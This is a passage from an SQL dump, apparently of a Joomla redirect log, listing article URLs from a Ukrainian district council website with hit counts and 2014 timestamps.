00:00:00',301),(1186,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1298:2014-04-24-11-02-55&catid=11&Itemid=14&lang=uk','','','',18,0,'2014-09-17 07:14:33','0000-00-00 00:00:00',301),(1187,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1322:------------2012-2015-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',15,0,'2014-09-17 07:14:43','0000-00-00 00:00:00',301),(1188,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1333:2014-06-05-13-09-03&catid=11&Itemid=14&lang=en','','','',11,0,'2014-09-17 07:15:08','0000-00-00 00:00:00',301),(1189,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=979:2013-03-29-09-18-27&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',8,0,'2014-09-17 07:15:32','0000-00-00 00:00:00',301),(1190,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1239:--29----6-&catid=11&lang=uk','','','',6,0,'2014-09-17 07:16:13','0000-00-00 00:00:00',301),(1191,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1121:--24--6-&catid=11&Itemid=14&lang=uk','','','',9,0,'2014-09-17 07:16:53','0000-00-00 00:00:00',301),(1192,'http://www.malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=4&Itemid=1&lang=uk','','','',7,0,'2014-09-17 07:17:30','0000-00-00 00:00:00',301),(1193,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1219:-2004-&catid=11&Itemid=14&lang=uk','','','',12,0,'2014-09-17 07:18:08','0000-00-00 00:00:00',301),(1194,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1056:-22-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',4,0,'2014-09-17 07:18:35','0000-00-00 00:00:00',301),(1195,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1053:2013-07-19-11-34-22&catid=51:--19072013-&Itemid=92&lang=ru','','','',18,0,'2014-09-17 07:18:45','0000-00-00 00:00:00',301),(1196,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1275:2014-04-10-13-24-47&catid=57:--15042014-&Itemid=98&lang=uk','','','',7,0,'2014-09-17 07:18:47','0000-00-00 00:00:00',301),(1197,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1378:2014-08-27-11-29-34&catid=11&Itemid=14&lang=uk','','','',27,0,'2014-09-17 07:18:50','0000-00-00 00:00:00',301),(1198,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=862:-qq&catid=15:2010-06-06-09-34-01&Itemid=18&lang=uk','','','',3,0,'2014-09-17 07:19:30','0000-00-00 00:00:00',301),(1199,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=863:-qq&catid=15&lang=uk','','','',1,0,'2014-09-17 07:19:32','0000-00-00 00:00:00',301),(1200,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1062:2013-07-29-13-33-29&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',16,0,'2014-09-17 07:20:13','0000-00-00 00:00:00',301),(1201,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1164:2013-12-29-11-46-36&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',8,0,'2014-09-17 07:20:15','0000-00-00 00:00:00',301),(1202,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1292:-i-&catid=11&Itemid=14&lang=uk','','','',11,0,'2014-09-17 07:21:48','0000-00-00 00:00:00',301),(1203,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1197:-l-r-&catid=56&Itemid=97&lang=ru','','','',11,0,'2014-09-17 07:21:50','0000-00-00 00:00:00',301),(1204,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1052:2013-07-19-11-32-33&catid=51:--19072013-&Itemid=92&lang=ru','','','',11,0,'2014-09-17 07:22:47','0000-00-00 00:00:00',301),(1205,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1378:2014-08-27-11-29-34&catid=11&Itemid=14&lang=ru','','','',13,0,'2014-09-17 07:23:26','0000-00-00 00:00:00',301),(1206,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1106:-qq&catid=15:2010-06-06-09-34-01&Itemid=18&lang=uk','','','',25,0,'2014-09-17 07:23:33','0000-00-00 00:00:00',301),(1207,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1090:-l-r-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',14,0,'2014-09-17 07:24:11','0000-00-00 00:00:00',301),(1208,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1131:9-------&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',8,0,'2014-09-17 07:24:15','0000-00-00 00:00:00',301),(1209,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1346:2014-06-18-11-51-53&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',19,0,'2014-09-17 07:24:17','0000-00-00 00:00:00',301),(1210,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1350:2014-06-23-07-06-24&catid=59:--20062014-&Itemid=107&lang=uk','','','',11,0,'2014-09-17 07:25:05','0000-00-00 00:00:00',301),(1211,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1063:2013-08-02-17-32-04&catid=11&Itemid=14&lang=uk','','','',20,0,'2014-09-17 07:25:19','0000-00-00 00:00:00',301),(1212,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=861:-qq&catid=15:2010-06-06-09-34-01&Itemid=18&lang=uk','','','',17,0,'2014-09-17 07:26:04','0000-00-00 00:00:00',301),(1213,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=969:-2013-&catid=46:--21122012&Itemid=85&lang=en','','','',12,0,'2014-09-17 07:28:07','0000-00-00 00:00:00',301),(1214,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1354:-lr-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',10,0,'2014-09-17 07:29:19','0000-00-00 00:00:00',301),(1215,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1320:-15-2010-12-l-r&catid=36&Itemid=70&lang=uk','','','',5,0,'2014-09-17 07:36:18','0000-00-00 00:00:00',301),(1216,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1376:2014-08-22-08-01-53&catid=11&Itemid=14&lang=en','','','',9,0,'2014-09-17 07:36:38','0000-00-00 00:00:00',301),(1217,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1204:2014-01-31-07-51-23&catid=56:--03022014-&Itemid=97&lang=uk','','','',16,0,'2014-09-17 07:36:59','0000-00-00 00:00:00',301),(1218,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1133:2013-11-14-07-12-22&catid=11&lang=uk','','','',8,0,'2014-09-17 07:42:14','0000-00-00 00:00:00',301),(1219,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1226:-1996-2004-&catid=11&Itemid=14&lang=uk','','','',25,0,'2014-09-17 07:42:45','0000-00-00 00:00:00',301),(1220,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1125:2013-10-31-07-20-16&catid=11&lang=ru&Itemid=0','','','',4,0,'2014-09-17 08:01:42','0000-00-00 00:00:00',301),(1221,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1298:2014-04-24-11-02-55&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',35,0,'2014-09-17 08:08:43','0000-00-00 00:00:00',301),(1222,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1326:-100-547&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',14,0,'2014-09-17 08:10:51','0000-00-00 00:00:00',301),(1223,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=925:-l-r-&catid=47&Itemid=86&lang=en','','','',8,0,'2014-09-17 08:11:04','0000-00-00 00:00:00',301),(1224,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1073:2013-08-30-11-12-19&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',9,0,'2014-09-17 08:12:19','0000-00-00 00:00:00',301),(1225,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1011:2013-05-29-09-51-28&catid=11&lang=ru','','','',10,0,'2014-09-17 08:15:00','0000-00-00 00:00:00',301),(1226,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1118:2013-10-25-12-24-30&catid=53&Itemid=94&lang=en','','','',8,0,'2014-09-17 08:16:55','0000-00-00 00:00:00',301),(1227,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1052:2013-07-19-11-32-33&catid=51&Itemid=92&lang=en','','','',14,0,'2014-09-17 08:23:00','0000-00-00 00:00:00',301),(1228,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=933:-2013-2017-&catid=47:-21022013-&Itemid=86&lang=en','','','',6,0,'2014-09-17 08:23:01','0000-00-00 00:00:00',301),(1229,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=957:199-&catid=11&Itemid=14&lang=en','','','',5,0,'2014-09-17 08:33:48','0000-00-00 00:00:00',301),(1230,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=938:---------------6612-------626-&catid=47:-21022013-&Itemid=86&lang=uk','','','',28,0,'2014-09-17 08:44:27','0000-00-00 00:00:00',301),(1231,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1100:2013-10-02-18-03-10&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',21,0,'2014-09-17 08:45:50','0000-00-00 00:00:00',301),(1232,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1265:2014-04-01-11-43-46&catid=11&lang=en','','','',10,0,'2014-09-17 08:46:05','0000-00-00 00:00:00',301),(1233,'http://www.malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=categories&lang=ru','','','',19,0,'2014-09-17 08:46:11','0000-00-00 00:00:00',301),(1234,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=890:2014-01-06-08-19-15&catid=11&Itemid=14&lang=uk','','','',8,0,'2014-09-17 08:47:56','0000-00-00 00:00:00',301),(1235,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1192:-2014-2015-&catid=56:--03022014-&Itemid=97&lang=uk','','','',21,0,'2014-09-17 08:49:30','0000-00-00 00:00:00',301),(1236,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1313:2014-05-14-10-00-55&catid=11&Itemid=14&lang=ru','','','',12,0,'2014-09-17 08:51:03','0000-00-00 00:00:00',301),(1237,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1188:2014-01-28-09-45-21&catid=56&Itemid=97&lang=en','','','',10,0,'2014-09-17 08:51:36','0000-00-00 00:00:00',301),(1238,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1103:2013-10-03-09-29-30&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',14,0,'2014-09-17 08:54:01','0000-00-00 00:00:00',301),(1239,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=948:-2012-&catid=49&Itemid=88&lang=en','','','',9,0,'2014-09-17 08:54:21','0000-00-00 00:00:00',301),(1240,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1257:2014-03-29-18-03-31&catid=11&lang=en','','','',9,0,'2014-09-17 08:54:48','0000-00-00 00:00:00',301),(1241,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=880:2012-12-21-17-03-54&catid=46:--21122012&Itemid=85&lang=uk','','','',12,0,'2014-09-17 08:55:03','0000-00-00 00:00:00',301),(1242,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1203:-2014-&catid=56&Itemid=97&lang=ru','','','',17,0,'2014-09-17 08:55:41','0000-00-00 00:00:00',301),(1243,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=934:---------6---16112010-5---------------&catid=47&Itemid=86&lang=en','','','',14,0,'2014-09-17 08:56:23','0000-00-00 00:00:00',301),(1244,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1346:2014-06-18-11-51-53&catid=11&lang=uk&Itemid=','','','',11,0,'2014-09-17 08:57:13','0000-00-00 00:00:00',301),(1245,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1346:2014-06-18-11-51-53&catid=11&lang=en&Itemid=','','','',7,0,'2014-09-17 08:58:20','0000-00-00 00:00:00',301),(1246,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1097:2013-09-25-08-35-50&catid=11&lang=ru&Itemid=','','','',3,0,'2014-09-17 08:58:25','0000-00-00 00:00:00',301),(1247,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1301:-28-&catid=11&lang=uk&Itemid=0','','','',5,0,'2014-09-17 08:59:53','0000-00-00 00:00:00',301),(1248,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=840:-----------------2007-2015-&catid=36&Itemid=70&lang=uk','','','',6,0,'2014-09-17 09:01:20','0000-00-00 00:00:00',301),(1249,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1223:--28-----6-&catid=11&lang=ru&Itemid=','','','',6,0,'2014-09-17 09:01:22','0000-00-00 00:00:00',301),(1250,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=903:-2012-&catid=11&Itemid=14&lang=uk','','','',10,0,'2014-09-17 09:02:02','0000-00-00 00:00:00',301),(1251,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1102:2013-10-03-08-08-33&catid=11&lang=ru&Itemid=','','','',2,0,'2014-09-17 09:02:51','0000-00-00 00:00:00',301),(1252,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1015:-200-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',5,0,'2014-09-17 09:05:21','0000-00-00 00:00:00',301),(1253,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1239:--29----6-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',12,0,'2014-09-17 09:05:58','0000-00-00 00:00:00',301),(1254,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=880:2012-12-21-17-03-54&catid=46&Itemid=85&lang=ru','','','',15,0,'2014-09-17 09:07:18','0000-00-00 00:00:00',301),(1255,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=918:-2013-2015-&catid=47&Itemid=86&lang=en','','','',10,0,'2014-09-17 09:12:29','0000-00-00 00:00:00',301),(1256,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1317:2014-05-25-18-25-09&catid=11&Itemid=14&lang=uk','','','',14,0,'2014-09-17 09:14:54','0000-00-00 00:00:00',301),(1257,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1152:2013-11-28-14-58-05&catid=54&Itemid=95&lang=uk','','','',6,0,'2014-09-17 09:25:20','0000-00-00 00:00:00',301),(1258,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1023:-------l---28r-&catid=36&Itemid=70&lang=ru','','','',3,0,'2014-09-17 09:26:10','0000-00-00 00:00:00',301),(1259,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1091:2013-09-19-12-13-07&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',14,0,'2014-09-17 09:27:41','0000-00-00 00:00:00',301),(1260,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1061:2013-07-29-08-58-16&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',12,0,'2014-09-17 09:30:10','0000-00-00 00:00:00',301),(1261,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1343:2014-06-14-17-26-47&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',11,0,'2014-09-17 09:39:28','0000-00-00 00:00:00',301),(1262,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1197:-----l---r------&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',13,0,'2014-09-17 09:47:33','0000-00-00 00:00:00',301),(1263,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1320:--------15--2010---12-l----r&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',10,0,'2014-09-17 09:49:56','0000-00-00 00:00:00',301),(1264,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1278:2014-04-11-13-44-30&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',22,0,'2014-09-17 09:52:24','0000-00-00 00:00:00',301),(1265,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=918:-2013-2015-&catid=47&Itemid=86&lang=uk','','','',17,0,'2014-09-17 09:53:57','0000-00-00 00:00:00',301),(1266,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1281:2014-04-15-09-13-01&catid=57:--15042014-&Itemid=98&lang=en','','','',18,0,'2014-09-17 09:54:30','0000-00-00 00:00:00',301),(1267,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1333:2014-06-05-13-09-03&catid=11&Itemid=14&lang=ru','','','',13,0,'2014-09-17 09:57:53','0000-00-00 00:00:00',301),(1268,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1244:-2014-2018-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',13,0,'2014-09-17 09:59:41','0000-00-00 00:00:00',301),(1269,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1285:2014-04-17-16-55-05&catid=11&Itemid=14&lang=en','','','',21,0,'2014-09-17 10:01:02','0000-00-00 00:00:00',301),(1270,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1242:------25--2011--74---19--2011---193-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',10,0,'2014-09-17 10:04:59','0000-00-00 00:00:00',301),(1271,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1252:2014-03-24-17-19-07&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',10,0,'2014-09-17 10:07:43','0000-00-00 00:00:00',301),(1272,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1256:2014-03-27-17-22-43&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',9,0,'2014-09-17 10:07:49','0000-00-00 00:00:00',301),(1273,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1078:-2007-2015-&catid=53:--25102013-&Itemid=94&lang=uk','','','',11,0,'2014-09-17 10:10:14','0000-00-00 00:00:00',301),(1274,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1176:--27----&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',7,0,'2014-09-17 10:10:42','0000-00-00 00:00:00',301),(1275,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1111:2013-10-22-16-06-36&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',14,0,'2014-09-17 10:13:52','0000-00-00 00:00:00',301),(1276,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=944:-l-r-&catid=49:--12042013-&Itemid=88&lang=ru','','','',12,0,'2014-09-17 10:15:44','0000-00-00 00:00:00',301),(1277,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1346:2014-06-18-11-51-53&catid=11&Itemid=14&lang=en','','','',16,0,'2014-09-17 10:16:35','0000-00-00 00:00:00',301),(1278,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=948:-2012-&catid=49:--12042013-&Itemid=88&lang=ru','','','',12,0,'2014-09-17 10:17:31','0000-00-00 00:00:00',301),(1279,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1188:2014-01-28-09-45-21&catid=56:--03022014-&Itemid=97&lang=uk','','','',9,0,'2014-09-17 10:18:46','0000-00-00 00:00:00',301),(1280,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=928:2013-02-21-09-10-17&catid=47&Itemid=86&lang=uk','','','',16,0,'2014-09-17 10:18:59','0000-00-00 00:00:00',301),(1281,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1345:2014-06-17-07-48-07&catid=59&Itemid=107&lang=en','','','',6,0,'2014-09-17 10:20:55','0000-00-00 00:00:00',301),(1282,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1029:2013-06-17-06-34-51&catid=51&Itemid=92&lang=en','','','',7,0,'2014-09-17 10:25:18','0000-00-00 00:00:00',301),(1283,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1087:-12-2013-398-l-2013-r-19-2013-416-l-2013-r&catid=53&Itemid=94&lang=en','','','',10,0,'2014-09-17 10:27:26','0000-00-00 00:00:00',301),(1284,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1021:---l---r&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',9,0,'2014-09-17 10:29:01','0000-00-00 00:00:00',301),(1285,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1065:2013-08-14-12-52-50&catid=11&lang=uk&Itemid=','','','',4,0,'2014-09-17 10:30:00','0000-00-00 00:00:00',301),(1286,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=866:2012-12-14-06-58-01&catid=11&Itemid=14&lang=ru','','','',2,0,'2014-09-17 10:30:29','0000-00-00 00:00:00',301),(1287,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1178:2014-01-21-12-39-34&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',10,0,'2014-09-17 10:31:52','0000-00-00 00:00:00',301),(1288,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1236:2014-03-07-06-36-44&catid=11&Itemid=14&lang=ru','','','',13,0,'2014-09-17 10:33:12','0000-00-00 00:00:00',301),(1289,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=922:2013-02-11-10-53-17&catid=11&lang=uk&Itemid=','','','',5,0,'2014-09-17 10:39:12','0000-00-00 00:00:00',301),(1290,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1312:2014-05-08-08-59-19&catid=11&Itemid=14&lang=en','','','',16,0,'2014-09-17 10:39:37','0000-00-00 00:00:00',301),(1291,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1097:2013-09-25-08-35-50&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',18,0,'2014-09-17 10:40:39','0000-00-00 00:00:00',301),(1292,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1124:2013-10-30-08-05-10&catid=11&Itemid=14&lang=en','','','',10,0,'2014-09-17 10:42:39','0000-00-00 00:00:00',301),(1293,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=872:2012-12-17-18-45-20&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',5,0,'2014-09-17 10:43:37','0000-00-00 00:00:00',301),(1294,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1279:2014-04-13-11-36-46&catid=11&Itemid=14&lang=uk','','','',20,0,'2014-09-17 10:43:51','0000-00-00 00:00:00',301),(1295,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1378:2014-08-27-11-29-34&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',5,0,'2014-09-17 10:43:54','0000-00-00 00:00:00',301),(1296,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1154:7----&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',9,0,'2014-09-17 10:44:49','0000-00-00 00:00:00',301),(1297,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=943:-qq&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',13,0,'2014-09-17 10:45:15','0000-00-00 00:00:00',301),(1298,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=890:2014-01-06-08-19-15&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',9,0,'2014-09-17 10:46:34','0000-00-00 00:00:00',301),(1299,'http://www.malyn-rayrada.org.ua/index.php?view=article&catid=11:2010-06-05-14-33-33&id=1212%3','','','',100,0,'2014-09-17 10:47:05','0000-00-00 00:00:00',301),(1300,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=935:----------14-112012332-l------r&catid=47:-21022013-&Itemid=86&lang=uk','','','',18,0,'2014-09-17 10:47:52','0000-00-00 00:00:00',301),(1301,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1104:-lr&catid=53:--25102013-&Itemid=94&lang=en','','','',10,0,'2014-09-17 10:47:57','0000-00-00 00:00:00',301),(1302,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1319:-2014-&catid=59:--20062014-&Itemid=107&lang=en','','','',8,0,'2014-09-17 10:49:24','0000-00-00 00:00:00',301),(1303,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1308:2014-05-05-05-20-51&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',11,0,'2014-09-17 10:49:27','0000-00-00 00:00:00',301),(1304,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1124:2013-10-30-08-05-10&catid=11&Itemid=14&lang=uk','','','',18,0,'2014-09-17 10:49:30','0000-00-00 00:00:00',301),(1305,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1107:c-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',17,0,'2014-09-17 10:50:17','0000-00-00 00:00:00',301),(1306,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1001:2013-04-30-12-14-17&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',12,0,'2014-09-17 10:50:31','0000-00-00 00:00:00',301),(1307,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=3&Itemid=7&lang=uk','','','',44,0,'2014-09-17 10:51:13','0000-00-00 00:00:00',301),(1308,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1040:2013-07-01-14-27-50&catid=11&Itemid=14&lang=ru','','','',7,0,'2014-09-17 10:51:53','0000-00-00 00:00:00',301),(1309,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1144:-lr&catid=54:--29112013-&Itemid=95&lang=en','','','',13,0,'2014-09-17 10:53:10','0000-00-00 00:00:00',301),(1310,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=949:2013-03-06-12-51-36&catid=49&Itemid=88&lang=en','','','',20,0,'2014-09-17 10:54:20','0000-00-00 00:00:00',301),(1311,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=936:2013-02-21-09-43-43&catid=47:-21022013-&Itemid=86&lang=ru','','','',19,0,'2014-09-17 10:54:33','0000-00-00 00:00:00',301),(1312,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=981:2013-04-03-07-23-01&catid=11&lang=uk&Itemid=','','','',5,0,'2014-09-17 10:55:11','0000-00-00 00:00:00',301),(1313,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=960:-19-&catid=11&lang=ru&Itemid=','','','',4,0,'2014-09-17 10:55:12','0000-00-00 00:00:00',301),(1314,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=959:2013-03-11-06-19-41&catid=49&Itemid=88&lang=en','','','',12,0,'2014-09-17 10:55:15','0000-00-00 00:00:00',301),(1315,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1282:-30-6-&catid=11&Itemid=14&lang=ru','','','',18,0,'2014-09-17 10:56:21','0000-00-00 00:00:00',301),(1316,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=918:----------2013-2015-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',10,0,'2014-09-17 10:56:39','0000-00-00 00:00:00',301),(1317,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1070:2013-08-23-04-27-00&catid=11&Itemid=14&lang=en','','','',8,0,'2014-09-17 10:57:32','0000-00-00 00:00:00',301),(1318,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=992:-3-&catid=11&lang=uk','','','',8,0,'2014-09-17 10:57:34','0000-00-00 00:00:00',301),(1319,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=930:2013-02-21-09-13-00&catid=47&Itemid=86&lang=en','','','',9,0,'2014-09-17 10:58:12','0000-00-00 00:00:00',301),(1320,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1281:2014-04-15-09-13-01&catid=57&Itemid=98&lang=en','','','',10,0,'2014-09-17 10:59:34','0000-00-00 00:00:00',301),(1321,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=922:2013-02-11-10-53-17&catid=11&lang=en&Itemid=0','','','',5,0,'2014-09-17 11:01:01','0000-00-00 